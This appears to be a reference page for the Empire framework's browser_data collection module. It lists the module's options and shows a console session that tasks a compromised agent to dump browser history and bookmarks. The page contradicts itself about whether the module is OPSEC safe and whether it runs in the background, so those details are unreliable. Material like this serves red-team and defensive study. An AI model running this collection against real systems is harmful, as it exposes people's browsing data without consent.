Get-BrowserData - Empire Module


This page contains detailed information about how to use the powershell/collection/browser_data Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Get-BrowserData
Module: powershell/collection/browser_data
Source code [1]: empire/server/modules/powershell/collection/browser_data.yaml
Source code [2]: empire/server/data/module_source/collection/Get-BrowserData.ps1
MITRE ATT&CK: T1503
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes

Search through browser history or bookmarks.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the browser_data module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the browser_data module:

Agent
Agent to run module on.

Additional Module Options


This is a list of additional options that are supported by the browser_data module:

Browser
Which browser to dump data from. IE, Chrome, Firefox, All.
Default value: All.

DataType
Specify to search history or bookmarks. History, Bookmarks.
Default value: All.

OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String.
Suggested values: Out-String, ConvertTo-Json, ConvertTo-Csv, ConvertTo-Html, ConvertTo-Xml.

Search
Specific a term to search for.

UserName
Username on the host to search.

Browser_data Example Usage


Here's an example of how to use the browser_data module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/browser_data

 Author       @424f424f                                   
 Background   True                                        
 Description  Search through browser history or bookmarks 
 Language     powershell                                  
 Name         powershell/collection/browser_data          
 NeedsAdmin   False                                       
 OpsecSafe    True                                        
 Techniques   http://attack.mitre.org/techniques/T1503    


,Record Options--,------------,----------,-------------------------------------,
| Name           | Value      | Required | Description                         |
|----------------|------------|----------|-------------------------------------|
| Agent          |            | True     | Agent to run module on.             |
|----------------|------------|----------|-------------------------------------|
| Browser        | All        | False    | Which browser to dump data from.    |
|                |            |          | IE, Chrome, Firefox, All.           |
|----------------|------------|----------|-------------------------------------|
| DataType       | All        | False    | Specify to search history or        |
|                |            |          | bookmarks. History, Bookmarks.      |
|----------------|------------|----------|-------------------------------------|
| OutputFunction | Out-String | False    | PowerShell's output function to use |
|                |            |          | ("Out-String", "ConvertTo-Json",    |
|                |            |          | "ConvertTo-Csv", "ConvertTo-Html",  |
|                |            |          | "ConvertTo-Xml").                   |
|----------------|------------|----------|-------------------------------------|
| Search         |            | False    | Specific a term to search for.      |
|----------------|------------|----------|-------------------------------------|
| UserName       |            | False    | Username on the host to search.     |
'----------------'------------'----------'-------------------------------------'

(Empire: usemodule/powershell/collection/browser_data) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/browser_data) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.